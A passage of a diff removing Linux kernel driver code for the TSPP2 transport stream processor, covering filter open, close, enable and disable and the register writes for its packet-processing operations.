--	list_add_tail(&filter->link, &src->filters_list);
--	src->num_associated_filters++;
--
--	/* Reset filter context-based counters */
--	tspp2_filter_counters_reset(filter->device, filter->context);
--
--	/* Reset this filter's context */
--	writel_relaxed((0x1 << TSPP2_MODULUS_OP(filter->context, 32)),
--		filter->device->base +
--		TSPP2_TSP_CONTEXT_RESET(filter->context >> 5));
--	writel_relaxed((0x1 << TSPP2_MODULUS_OP(filter->context, 32)),
--		filter->device->base +
--		TSPP2_PES_CONTEXT_RESET(filter->context >> 5));
--	writel_relaxed((0x1 << TSPP2_MODULUS_OP(filter->context, 32)),
--		filter->device->base +
--		TSPP2_INDEXING_CONTEXT_RESET(filter->context >> 5));
--
--	/* Write PID and mask */
--	reg = ((pid << FILTER_ENTRY0_PID_OFFS) |
--		(mask << FILTER_ENTRY0_MASK_OFFS));
--	writel_relaxed(reg, filter->device->base +
--		TSPP2_FILTER_ENTRY0(filter->hw_index));
--
--	writel_relaxed((filter->context << FILTER_ENTRY1_CONTEXT_OFFS),
--		filter->device->base + TSPP2_FILTER_ENTRY1(filter->hw_index));
--
--	*filter_handle = (u32)filter;
--
--	mutex_unlock(&src->device->mutex);
--
--	pm_runtime_mark_last_busy(src->device->dev);
--	pm_runtime_put_autosuspend(src->device->dev);
--
--	dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_filter_open);
--
--/**
-- * tspp2_hw_filters_in_batch() - Check for used HW filters in a batch.
-- *
-- * @batch:	The filter batch to check.
-- *
-- * Helper function to check if there are any HW filters used on this batch.
-- *
-- * Return 1 if found a used filter in this batch, 0 otherwise.
-- */
--static inline int tspp2_hw_filters_in_batch(struct tspp2_filter_batch *batch)
--{
--	int i;
--
--	for (i = 0; i < TSPP2_FILTERS_PER_BATCH; i++)
--		if (batch->hw_filters[i] == 1)
--			return 1;
--
--	return 0;
--}
--
--/**
-- * tspp2_filter_close() - Close a filter.
-- *
-- * @filter_handle:	Filter to close.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_filter_close(u32 filter_handle)
--{
--	int i;
--	int ret;
--	struct tspp2_device *device;
--	struct tspp2_src *src = NULL;
--	struct tspp2_filter_batch *batch = NULL;
--	struct tspp2_filter_batch *tmp_batch;
--	struct tspp2_filter *filter = (struct tspp2_filter *)filter_handle;
--
--	if (!filter) {
--		pr_err("%s: Invalid filter handle\n", __func__);
--		return -EINVAL;
--	}
--
--	device = filter->device;
--
--	ret = pm_runtime_get_sync(device->dev);
--	if (ret < 0)
--		return ret;
--
--	mutex_lock(&device->mutex);
--
--	if (!device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&device->mutex);
--		pm_runtime_mark_last_busy(device->dev);
--		pm_runtime_put_autosuspend(device->dev);
--		return -EPERM;
--	}
--
--	if (!filter->opened) {
--		pr_err("%s: Filter already closed\n", __func__);
--		mutex_unlock(&device->mutex);
--		pm_runtime_mark_last_busy(device->dev);
--		pm_runtime_put_autosuspend(device->dev);
--		return -EINVAL;
--	}
--
--	if (filter->num_user_operations)
--		pr_warn("%s: Closing filters that has %d operations\n",
--			__func__, filter->num_user_operations);
--
--	/* Disable filter */
--	writel_relaxed(0, device->base +
--		TSPP2_FILTER_ENTRY0(filter->hw_index));
--
--	/* Clear filter operations in HW as well as related SW fields */
--	tspp2_filter_ops_clear(filter);
--
--	/* Reset filter context-based counters */
--	tspp2_filter_counters_reset(device, filter->context);
--
--	/* Reset filter context and release it back to the device */
--	tspp2_filter_context_reset(filter);
--
--	/* Mark filter as unused in batch */
--	filter->batch->hw_filters[(filter->hw_index -
--		(filter->batch->batch_id * TSPP2_FILTERS_PER_BATCH))] = 0;
--
--	/* Remove filter from source */
--	list_del(&filter->link);
--	filter->src->num_associated_filters--;
--
--	/* We may need to update the reserved filter for this source.
--	 * Cases to handle:
--	 * 1. This is the last filter on this source.
--	 * 2. This is the last filter on this batch + reserved filter is not on
--	 * this batch.
--	 * 3. This is the last filter on this batch + reserved filter is on this
--	 * batch. Can possibly move reserved filter to another batch if space is
--	 * available.
--	 * 4. This is not the last filter on this batch. The reserved filter may
--	 * be the only one taking another batch and may be moved to this batch
--	 * to save space.
--	 */
--
--	src = filter->src;
--	/*
--	 * Case #1: this could be the last filter associated with this source.
--	 * If this is the case, we can release the batch too. We don't care
--	 * about the reserved HW filter index, since there are no more filters.
--	 */
--	if (src->num_associated_filters == 0) {
--		filter->batch->src = NULL;
--		list_del(&filter->batch->link);
--		src->num_associated_batches--;
--		tspp2_src_batch_set(src, filter->batch->batch_id, 0);
--		src->reserved_filter_hw_index = 0;
--		goto filter_clear;
--	}
--
--	/*
--	 * If this is the last filter that was used in this batch, we may be
--	 * able to release this entire batch. However, we have to make sure the
--	 * reserved filter is not in this batch. If it is, we may find a place
--	 * for it in another batch in this source.
--	 */
--	if (!tspp2_hw_filters_in_batch(filter->batch)) {
--		/* There are no more used filters on this batch */
--		if ((src->reserved_filter_hw_index <
--			(filter->batch->batch_id * TSPP2_FILTERS_PER_BATCH)) ||
--			(src->reserved_filter_hw_index >=
--			((filter->batch->batch_id * TSPP2_FILTERS_PER_BATCH) +
--				TSPP2_FILTERS_PER_BATCH))) {
--			/* Case #2: the reserved filter is not on this batch */
--			filter->batch->src = NULL;
--			list_del(&filter->batch->link);
--			src->num_associated_batches--;
--			tspp2_src_batch_set(src, filter->batch->batch_id, 0);
--		} else {
--			/*
--			 * Case #3: see if we can "move" the reserved filter to
--			 * a different batch.
--			 */
--			list_for_each_entry_safe(batch, tmp_batch,
--					&src->batches_list, link) {
--				if (batch == filter->batch)
--					continue;
--
--				for (i = 0; i < TSPP2_FILTERS_PER_BATCH; i++) {
--					if (batch->hw_filters[i] == 0) {
--						src->reserved_filter_hw_index =
--							(batch->batch_id *
--							TSPP2_FILTERS_PER_BATCH)
--							+ i;
--
--						filter->batch->src = NULL;
--						list_del(&filter->batch->link);
--						src->num_associated_batches--;
--						tspp2_src_batch_set(src,
--							filter->batch->batch_id,
--							0);
--						goto filter_clear;
--					}
--				}
--			}
--		}
--	} else {
--		/* Case #4: whenever we remove a filter, there is always a
--		 * chance that the reserved filter was the only filter used on a
--		 * different batch. So now this is a good opportunity to check
--		 * if we can release that batch and use the index of the filter
--		 * we're freeing instead.
--		 */
--		list_for_each_entry_safe(batch, tmp_batch,
--				&src->batches_list, link) {
--			if (((src->reserved_filter_hw_index >=
--				(batch->batch_id * TSPP2_FILTERS_PER_BATCH)) &&
--				(src->reserved_filter_hw_index <
--				(batch->batch_id * TSPP2_FILTERS_PER_BATCH +
--				TSPP2_FILTERS_PER_BATCH))) &&
--				!tspp2_hw_filters_in_batch(batch)) {
--				src->reserved_filter_hw_index =
--					filter->hw_index;
--				batch->src = NULL;
--				list_del(&batch->link);
--				src->num_associated_batches--;
--				tspp2_src_batch_set(src, batch->batch_id, 0);
--				break;
--			}
--		}
--	}
--
--filter_clear:
--	tspp2_filter_sw_reset(filter);
--
--	mutex_unlock(&device->mutex);
--
--	pm_runtime_mark_last_busy(device->dev);
--	pm_runtime_put_autosuspend(device->dev);
--
--	dev_dbg(device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_filter_close);
--
--/**
-- * tspp2_filter_enable() - Enable a filter.
-- *
-- * @filter_handle:	Filter to enable.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_filter_enable(u32 filter_handle)
--{
--	struct tspp2_filter *filter = (struct tspp2_filter *)filter_handle;
--	u32 reg;
--	int ret;
--
--	if (!filter) {
--		pr_err("%s: Invalid filter handle\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(filter->device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&filter->device->mutex)) {
--		pm_runtime_mark_last_busy(filter->device->dev);
--		pm_runtime_put_autosuspend(filter->device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!filter->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&filter->device->mutex);
--		pm_runtime_mark_last_busy(filter->device->dev);
--		pm_runtime_put_autosuspend(filter->device->dev);
--		return -EPERM;
--	}
--
--	if (!filter->opened) {
--		pr_err("%s: Filter not opened\n", __func__);
--		mutex_unlock(&filter->device->mutex);
--		pm_runtime_mark_last_busy(filter->device->dev);
--		pm_runtime_put_autosuspend(filter->device->dev);
--		return -EINVAL;
--	}
--
--	if (filter->enabled) {
--		pr_warn("%s: Filter already enabled\n", __func__);
--		mutex_unlock(&filter->device->mutex);
--		pm_runtime_mark_last_busy(filter->device->dev);
--		pm_runtime_put_autosuspend(filter->device->dev);
--		return 0;
--	}
--
--	reg = readl_relaxed(filter->device->base +
--		TSPP2_FILTER_ENTRY0(filter->hw_index));
--	reg |= (0x1 << FILTER_ENTRY0_EN_OFFS);
--	writel_relaxed(reg, filter->device->base +
--		TSPP2_FILTER_ENTRY0(filter->hw_index));
--
--	filter->enabled = 1;
--
--	mutex_unlock(&filter->device->mutex);
--
--	pm_runtime_mark_last_busy(filter->device->dev);
--	pm_runtime_put_autosuspend(filter->device->dev);
--
--	dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_filter_enable);
--
--/**
-- * tspp2_filter_disable() - Disable a filter.
-- *
-- * @filter_handle:	Filter to disable.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_filter_disable(u32 filter_handle)
--{
--	struct tspp2_filter *filter = (struct tspp2_filter *)filter_handle;
--	u32 reg;
--	int ret;
--
--	if (!filter) {
--		pr_err("%s: Invalid filter handle\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(filter->device->dev);
--	if (ret < 0)
--		return ret;
--
--	mutex_lock(&filter->device->mutex);
--
--	if (!filter->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&filter->device->mutex);
--		pm_runtime_mark_last_busy(filter->device->dev);
--		pm_runtime_put_autosuspend(filter->device->dev);
--		return -EPERM;
--	}
--
--	if (!filter->opened) {
--		pr_err("%s: Filter not opened\n", __func__);
--		mutex_unlock(&filter->device->mutex);
--		pm_runtime_mark_last_busy(filter->device->dev);
--		pm_runtime_put_autosuspend(filter->device->dev);
--		return -EINVAL;
--	}
--
--	if (!filter->enabled) {
--		pr_warn("%s: Filter already disabled\n", __func__);
--		mutex_unlock(&filter->device->mutex);
--		pm_runtime_mark_last_busy(filter->device->dev);
--		pm_runtime_put_autosuspend(filter->device->dev);
--		return 0;
--	}
--
--	reg = readl_relaxed(filter->device->base +
--		TSPP2_FILTER_ENTRY0(filter->hw_index));
--	reg &= ~(0x1 << FILTER_ENTRY0_EN_OFFS);
--	writel_relaxed(reg, filter->device->base +
--		TSPP2_FILTER_ENTRY0(filter->hw_index));
--
--	/*
--	 * HW requires we wait for up to 2ms here before closing the pipes
--	 * used by this filter
--	 */
--	udelay(TSPP2_HW_DELAY_USEC);
--
--	filter->enabled = 0;
--
--	mutex_unlock(&filter->device->mutex);
--
--	pm_runtime_mark_last_busy(filter->device->dev);
--	pm_runtime_put_autosuspend(filter->device->dev);
--
--	dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_filter_disable);
--
--/**
-- * tspp2_pes_analysis_op_write() - Write a PES Analysis operation.
-- *
-- * @filter:	The filter to set the operation to.
-- * @op:		The operation.
-- * @op_index:	The operation's index in this filter.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_pes_analysis_op_write(struct tspp2_filter *filter,
--				const struct tspp2_operation *op,
--				u8 op_index)
--{
--	u32 reg = 0;
--
--	if (filter->mask != TSPP2_UNIQUE_PID_MASK) {
--		pr_err(
--			"%s: A filter with a PES Analysis operation must handle a unique PID\n",
--			__func__);
--		return -EINVAL;
--	}
--
--	/*
--	 * Bits[19:6] = 0, Bit[5] = Source,
--	 * Bit[4] = Skip, Bits[3:0] = Opcode
--	 */
--	reg |= TSPP2_OPCODE_PES_ANALYSIS;
--	if (op->params.pes_analysis.skip_ts_errs)
--		reg |= (0x1 << 4);
--
--	if (op->params.pes_analysis.input == TSPP2_OP_BUFFER_B)
--		reg |= (0x1 << 5);
--
--	filter->pes_analysis_op_set = 1;
--
--	writel_relaxed(reg, filter->device->base +
--				TSPP2_OPCODE(filter->hw_index, op_index));
--
--	dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--
--/**
-- * tspp2_raw_tx_op_write() - Write a RAW Transmit operation.
-- *
-- * @filter:	The filter to set the operation to.
-- * @op:		The operation.
-- * @op_index:	The operation's index in this filter.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_raw_tx_op_write(struct tspp2_filter *filter,
--				const struct tspp2_operation *op,
--				u8 op_index)
--{
--	u32 reg = 0;
--	int timestamp = 0;
--	struct tspp2_pipe *pipe = (struct tspp2_pipe *)
--			op->params.raw_transmit.output_pipe_handle;
--
--	if (!pipe || !pipe->opened) {
--		pr_err("%s: Invalid pipe handle\n", __func__);
--		return -EINVAL;
--	}
--
--	/*
--	 * Bits[19:16] = 0, Bit[15] = Support Indexing,
--	 * Bit[14] = Timestamp position,
--	 * Bits[13:12] = Timestamp mode,
--	 * Bits[11:6] = Output pipe, Bit[5] = Source,
--	 * Bit[4] = Skip, Bits[3:0] = Opcode
--	 */
--	reg |= TSPP2_OPCODE_RAW_TRANSMIT;
--	if (op->params.raw_transmit.skip_ts_errs)
--		reg |= (0x1 << 4);
--
--	if (op->params.raw_transmit.input == TSPP2_OP_BUFFER_B)
--		reg |= (0x1 << 5);
--
--	reg |= ((pipe->hw_index & 0x3F) << 6);
--
--	switch (op->params.raw_transmit.timestamp_mode) {
--	case TSPP2_OP_TIMESTAMP_NONE:
--		/* nothing to do, keep bits value as 0 */
--		break;
--	case TSPP2_OP_TIMESTAMP_ZERO:
--		reg |= (0x1 << 12);
--		timestamp = 1;
--		break;
--	case TSPP2_OP_TIMESTAMP_STC:
--		reg |= (0x2 << 12);
--		timestamp = 1;
--		break;
--	default:
--		pr_err("%s: Invalid timestamp mode\n", __func__);
--		return -EINVAL;
--	}
--
--	if (timestamp && op->params.raw_transmit.timestamp_position ==
--					TSPP2_PACKET_FORMAT_188_RAW) {
--		pr_err("%s: Invalid timestamp position\n", __func__);
--		return -EINVAL;
--	}
--
--	if (op->params.raw_transmit.timestamp_position ==
--				TSPP2_PACKET_FORMAT_192_TAIL)
--		reg |= (0x1 << 14);
--
--	if (op->params.raw_transmit.support_indexing) {
--		if (filter->raw_op_with_indexing) {
--			pr_err(
--				"%s: Only one Raw Transmit operation per filter can support HW indexing\n",
--				__func__);
--			return -EINVAL;
--		}
--		filter->raw_op_with_indexing = 1;
--		reg |= (0x1 << 15);
--	}
--
--	filter->raw_op_set = 1;
--
--	writel_relaxed(reg, filter->device->base +
--				TSPP2_OPCODE(filter->hw_index, op_index));
--
--	dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--
--/**
-- * tspp2_pes_tx_op_write() - Write a PES Transmit operation.
-- *
-- * @filter:	The filter to set the operation to.
-- * @op:		The operation.
-- * @op_index:	The operation's index in this filter.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_pes_tx_op_write(struct tspp2_filter *filter,
--				const struct tspp2_operation *op,
--				u8 op_index)
--{
--	u32 reg = 0;
--	struct tspp2_pipe *payload_pipe = (struct tspp2_pipe *)
--		op->params.pes_transmit.output_pipe_handle;
--	struct tspp2_pipe *header_pipe;
--
--	if (!payload_pipe || !payload_pipe->opened) {
--		pr_err("%s: Invalid payload pipe handle\n", __func__);
--		return -EINVAL;
--	}
--
--	if (!filter->pes_analysis_op_set) {
--		pr_err(
--			"%s: PES Analysys operation must precede any PES Transmit operation\n",
--			__func__);
--		return -EINVAL;
--	}
--
--	/*
--	 * Bits[19:18] = 0, Bits[17:12] = PES Header output pipe,
--	 * Bits[11:6] = Output pipe, Bit[5] = Source,
--	 * Bit[4] = Attach STC and flags,
--	 * Bit[3] = Disable TX on PES discontinuity,
--	 * Bit[2] = Enable SW indexing, Bit[1] = Mode, Bit[0] = 0
--	 */
--
--	if (op->params.pes_transmit.mode == TSPP2_OP_PES_TRANSMIT_FULL) {
--		reg |= (0x1 << 1);
--	} else {
--		/* Separated PES mode requires another pipe */
--		header_pipe = (struct tspp2_pipe *)
--			op->params.pes_transmit.header_output_pipe_handle;
--
--		if (!header_pipe || !header_pipe->opened) {
--			pr_err("%s: Invalid header pipe handle\n", __func__);
--			return -EINVAL;
--		}
--
--		reg |= ((header_pipe->hw_index & 0x3F) << 12);
--	}
--
--	if (op->params.pes_transmit.enable_sw_indexing) {
--		if (!filter->raw_op_set) {
--			pr_err(
--				"%s: PES Transmit operation with SW indexing must be preceded by a Raw Transmit operation\n",
--				__func__);
--			return -EINVAL;
--		}
--		reg |= (0x1 << 2);
--	}
--
--	if (op->params.pes_transmit.disable_tx_on_pes_discontinuity)
--		reg |= (0x1 << 3);
--
--	if (op->params.pes_transmit.attach_stc_flags)
--		reg |= (0x1 << 4);
--
--	if (op->params.pes_transmit.input == TSPP2_OP_BUFFER_B)
--		reg |= (0x1 << 5);
--
--	reg |= ((payload_pipe->hw_index & 0x3F) << 6);
--
--	filter->pes_tx_op_set = 1;
--
--	writel_relaxed(reg, filter->device->base +
--				TSPP2_OPCODE(filter->hw_index, op_index));
--
--	dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--
--/**
-- * tspp2_pcr_op_write() - Write a PCR Extraction operation.
-- *
-- * @filter:	The filter to set the operation to.
-- * @op:		The operation.
-- * @op_index:	The operation's index in this filter.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_pcr_op_write(struct tspp2_filter *filter,
--				const struct tspp2_operation *op,
--				u8 op_index)
--{
--	u32 reg = 0;
--	struct tspp2_pipe *pipe = (struct tspp2_pipe *)
--			op->params.pcr_extraction.output_pipe_handle;
--
--	if (!pipe || !pipe->opened) {
--		pr_err("%s: Invalid pipe handle\n", __func__);
--		return -EINVAL;
--	}
--
--	if (!op->params.pcr_extraction.extract_pcr &&
--		!op->params.pcr_extraction.extract_opcr &&
--		!op->params.pcr_extraction.extract_splicing_point &&
--		!op->params.pcr_extraction.extract_transport_private_data &&
--		!op->params.pcr_extraction.extract_af_extension &&
--		!op->params.pcr_extraction.extract_all_af) {
--		pr_err("%s: Invalid extraction parameters\n", __func__);
--		return -EINVAL;
--	}
--
--	/*
--	 * Bits[19:18] = 0, Bit[17] = All AF, Bit[16] = AF Extension,
--	 * Bit[15] = Transport Priave Data, Bit[14] = Splicing Point,
--	 * Bit[13] = OPCR, Bit[12] = PCR, Bits[11:6] = Output pipe,
--	 * Bit[5] = Source, Bit[4] = Skip, Bits[3:0] = Opcode
--	 */
--	reg |= TSPP2_OPCODE_PCR_EXTRACTION;
--	if (op->params.pcr_extraction.skip_ts_errs)
--		reg |= (0x1 << 4);
--
--	if (op->params.pcr_extraction.input == TSPP2_OP_BUFFER_B)
--		reg |= (0x1 << 5);
--
--	reg |= ((pipe->hw_index & 0x3F) << 6);
--
--	if (op->params.pcr_extraction.extract_pcr)
--		reg |= (0x1 << 12);
--
--	if (op->params.pcr_extraction.extract_opcr)
--		reg |= (0x1 << 13);
--
--	if (op->params.pcr_extraction.extract_splicing_point)
--		reg |= (0x1 << 14);
--
--	if (op->params.pcr_extraction.extract_transport_private_data)
--		reg |= (0x1 << 15);
--
--	if (op->params.pcr_extraction.extract_af_extension)
--		reg |= (0x1 << 16);
--
--	if (op->params.pcr_extraction.extract_all_af)
--		reg |= (0x1 << 17);
--
--	writel_relaxed(reg, filter->device->base +
--				TSPP2_OPCODE(filter->hw_index, op_index));
--
--	dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--
--/**
-- * tspp2_cipher_op_write() - Write a Cipher operation.
-- *
-- * @filter:	The filter to set the operation to.
-- * @op:		The operation.
-- * @op_index:	The operation's index in this filter.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_cipher_op_write(struct tspp2_filter *filter,
--				const struct tspp2_operation *op,
--				u8 op_index)
--{
--	u32 reg = 0;
--
--	/*
--	 * Bits[19:18] = 0, Bits[17:15] = Scrambling related,
--	 * Bit[14] = Mode, Bit[13] = Decrypt PES header,
--	 * Bits[12:7] = Key ladder index, Bit[6] = Destination,
--	 * Bit[5] = Source, Bit[4] = Skip, Bits[3:0] = Opcode
--	 */
--
--	reg |= TSPP2_OPCODE_CIPHER;
--	if (op->params.cipher.skip_ts_errs)
--		reg |= (0x1 << 4);
--
--	if (op->params.cipher.input == TSPP2_OP_BUFFER_B)
--		reg |= (0x1 << 5);
--
--	if (op->params.cipher.output == TSPP2_OP_BUFFER_B)
--		reg |= (0x1 << 6);
--
--	reg |= ((op->params.cipher.key_ladder_index & 0x3F) << 7);
--
--	if (op->params.cipher.mode == TSPP2_OP_CIPHER_ENCRYPT &&
--		op->params.cipher.decrypt_pes_header) {
--		pr_err("%s: Invalid parameters\n", __func__);
--		return -EINVAL;
--	}
--
--	if (op->params.cipher.decrypt_pes_header)
--		reg |= (0x1 << 13);
--
--	if (op->params.cipher.mode == TSPP2_OP_CIPHER_ENCRYPT)
--		reg |= (0x1 << 14);
--
--	switch (op->params.cipher.scrambling_mode) {
--	case TSPP2_OP_CIPHER_AS_IS:
--		reg |= (0x1 << 15);
--		break;
--	case TSPP2_OP_CIPHER_SET_SCRAMBLING_0:
--		/* nothing to do, keep bits[17:16] as 0 */
--		break;
--	case TSPP2_OP_CIPHER_SET_SCRAMBLING_1:
--		reg |= (0x1 << 16);
--		break;
--	case TSPP2_OP_CIPHER_SET_SCRAMBLING_2:
--		reg |= (0x2 << 16);
--		break;
--	case TSPP2_OP_CIPHER_SET_SCRAMBLING_3:
--		reg |= (0x3 << 16);
--		break;
--	default:
--		pr_err("%s: Invalid scrambling mode\n", __func__);
--		return -EINVAL;
--	}
--
--	writel_relaxed(reg, filter->device->base +
--				TSPP2_OPCODE(filter->hw_index, op_index));
--
--	dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--
--/**
-- * tspp2_index_op_write() - Write an Indexing operation.
-- *
-- * @filter:	The filter to set the operation to.
-- * @op:		The operation.
-- * @op_index:	The operation's index in this filter.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_index_op_write(struct tspp2_filter *filter,
--				const struct tspp2_operation *op,
--				u8 op_index)
--{
--	u32 reg = 0;
--	u32 filter_reg = 0;
--	struct tspp2_pipe *pipe = (struct tspp2_pipe *)
--			op->params.indexing.output_pipe_handle;
--
--	if (!pipe || !pipe->opened) {
--		pr_err("%s: Invalid pipe handle\n", __func__);
--		return -EINVAL;
--	}
--
--	/* Enforce Indexing related HW restrictions */
--	if (filter->indexing_op_set) {
--		pr_err(
--			"%s: Only one indexing operation supported per filter\n",
--			__func__);
--		return -EINVAL;
--	}
--	if (!filter->raw_op_with_indexing) {
--		pr_err(
--			"%s: Raw Transmit operation with indexing support must be configured before the Indexing operation\n",
--			__func__);
--		return -EINVAL;
--	}
--
--	if (!filter->pes_analysis_op_set) {
--		pr_err(
--			"%s: PES Analysis operation must precede Indexing operation\n",
--			__func__);
--		return -EINVAL;
--	}
--
--	/*
--	 * Bits [19:15] = 0, Bit[14] = Index by RAI,
--	 * Bits[13:12] = 0,
--	 * Bits[11:6] = Output pipe, Bit[5] = Source,
--	 * Bit[4] = Skip, Bits[3:0] = Opcode
--	 */
--
--	reg |= TSPP2_OPCODE_INDEXING;
--	if (op->params.indexing.skip_ts_errs)
--		reg |= (0x1 << 4);
--
--	if (op->params.indexing.input == TSPP2_OP_BUFFER_B)
--		reg |= (0x1 << 5);
--
--	reg |= ((pipe->hw_index & 0x3F) << 6);
--
--	if (op->params.indexing.random_access_indicator_indexing)
--		reg |= (0x1 << 14);
--
--	/* Indexing table ID is set in the filter and not in the operation */
--	filter->indexing_table_id = op->params.indexing.indexing_table_id;
--	filter_reg = readl_relaxed(filter->device->base +
--				TSPP2_FILTER_ENTRY0(filter->hw_index));
--	filter_reg &= ~(0x3 << FILTER_ENTRY0_CODEC_OFFS);
--	filter_reg |= (filter->indexing_table_id << FILTER_ENTRY0_CODEC_OFFS);
--	writel_relaxed(filter_reg, filter->device->base +
--			TSPP2_FILTER_ENTRY0(filter->hw_index));
--
--	filter->indexing_op_set = 1;
--
--	writel_relaxed(reg, filter->device->base +
--				TSPP2_OPCODE(filter->hw_index, op_index));
--
--	dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--
--/**
-- * tspp2_copy_op_write() - Write an Copy operation.
-- *
-- * @filter:	The filter to set the operation to.
-- * @op:		The operation.
-- * @op_index:	The operation's index in this filter.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_copy_op_write(struct tspp2_filter *filter,
--				const struct tspp2_operation *op,
--				u8 op_index)
--{
--	u32 reg = 0;
--
--	/* Bits[19:6] = 0, Bit[5] = Source, Bit[4] = 0, Bits[3:0] = Opcode */
--	reg |= TSPP2_OPCODE_COPY_PACKET;
--	if (op->params.copy_packet.input == TSPP2_OP_BUFFER_B)
--		reg |= (0x1 << 5);
--
--	writel_relaxed(reg, filter->device->base +
--				TSPP2_OPCODE(filter->hw_index, op_index));
--
--	dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--
--/**
-- * tspp2_op_write() - Write an operation of any type.
-- *
-- * @filter:	The filter to set the operation to.
-- * @op:		The operation.
-- * @op_index:	The operation's index in this filter.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_op_write(struct tspp2_filter *filter,
--				const struct tspp2_operation *op,
--				u8 op_index)
--{
--	switch (op->type) {
--	case TSPP2_OP_PES_ANALYSIS:
--		return tspp2_pes_analysis_op_write(filter, op, op_index);
--	case TSPP2_OP_RAW_TRANSMIT:
--		return tspp2_raw_tx_op_write(filter, op, op_index);
--	case TSPP2_OP_PES_TRANSMIT:
--		return tspp2_pes_tx_op_write(filter, op, op_index);
--	case TSPP2_OP_PCR_EXTRACTION:
--		return tspp2_pcr_op_write(filter, op, op_index);
--	case TSPP2_OP_CIPHER:
--		return tspp2_cipher_op_write(filter, op, op_index);
--	case TSPP2_OP_INDEXING:
--		return tspp2_index_op_write(filter, op, op_index);
--	case TSPP2_OP_COPY_PACKET:
--		return tspp2_copy_op_write(filter, op, op_index);
--	default:
--		pr_warn("%s: Unknown operation type\n", __func__);
--		return -EINVAL;
--	}
--}
--
--/**
-- * tspp2_filter_ops_add() - Set the operations of a disabled filter.
-- *
-- * @filter:	The filter to work on.
-- * @op:		The new operations array.
-- * @op_index:	The number of operations in the array.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_filter_ops_add(struct tspp2_filter *filter,
--				const struct tspp2_operation *ops,
--				u8 operations_num)
--{
--	int i;
--	int ret = 0;
--
--	/* User parameter validity checks were already performed */
--
--	/*
--	 * We want to start with a clean slate here. The user may call us to
--	 * set operations several times, so need to make sure only the last call
--	 * counts.
--	 */
--	tspp2_filter_ops_clear(filter);
--
--	/* Save user operations in filter's database */
--	for (i = 0; i < operations_num; i++)
--		filter->operations[i] = ops[i];
--
--	/* Write user operations to HW */
--	for (i = 0; i < operations_num; i++) {
--		ret = tspp2_op_write(filter, &ops[i], i);
--		if (ret)
--			goto ops_cleanup;
--	}
--
--	/*
--	 * Here we want to add the Exit operation implicitly if required, that
--	 * is, if the user provided less than TSPP2_MAX_OPS_PER_FILTER
--	 * operations. However, we already called tspp2_filter_ops_clear()
--	 * which set all the operations in HW to Exit, before writing the
--	 * actual user operations. So, no need to do it again here.
--	 * Also, if someone calls this function with operations_num == 0,
--	 * it is similar to calling tspp2_filter_operations_clear().
--	 */
--
--	filter->num_user_operations = operations_num;
--
--	dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--
--ops_cleanup:
--	pr_err("%s: Failed to set operations to filter, clearing all\n",
--		__func__);
--
--	tspp2_filter_ops_clear(filter);
--
--	return ret;
--}
--
--/**
-- * tspp2_filter_ops_update() - Update the operations of an enabled filter.
-- *
-- * This function updates the operations of an enabled filter. In fact, it is
-- * not possible to update an existing filter without disabling it, clearing
-- * the existing operations and setting new ones. However, if we do that,
-- * we'll miss TS packets and not handle the stream properly, so a smooth
-- * transition is required.
-- * The algorithm is as follows:
-- * 1. Find a free temporary filter object.
-- * 2. Set the new filter's HW index to the reserved HW index.
-- * 3. Set the operations to the new filter. This sets the operations to
-- * the correct HW registers, based on the new HW index, and also updates
-- * the relevant information in the temporary filter object. Later we copy this
-- * to the actual filter object.
-- * 4. Use the same context as the old filter (to maintain HW state).
-- * 5. Reset parts of the context if needed.
-- * 6. Enable the new HW filter, then disable the old filter.
-- * 7. Update the source's reserved filter HW index.
-- * 8. Update the filter's batch, HW index and operations-related information.
-- *
-- * @filter:	The filter to work on.
-- * @op:		The new operations array.
-- * @op_index:	The number of operations in the array.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_filter_ops_update(struct tspp2_filter *filter,
--				const struct tspp2_operation *ops,
--				u8 operations_num)
--{
--	int i;
--	int ret = 0;
--	int found = 0;
--	u32 reg = 0;
--	u16 hw_idx;
--	struct tspp2_filter_batch *batch;
--	struct tspp2_filter *tmp_filter = NULL;
--	struct tspp2_src *src = filter->src;
--
--	/*
--	 * Find an available temporary filter object in the device's
--	 * filters database.
--	 */
--	for (i = 0; i < TSPP2_NUM_AVAIL_FILTERS; i++)
--		if (!src->device->filters[i].opened)
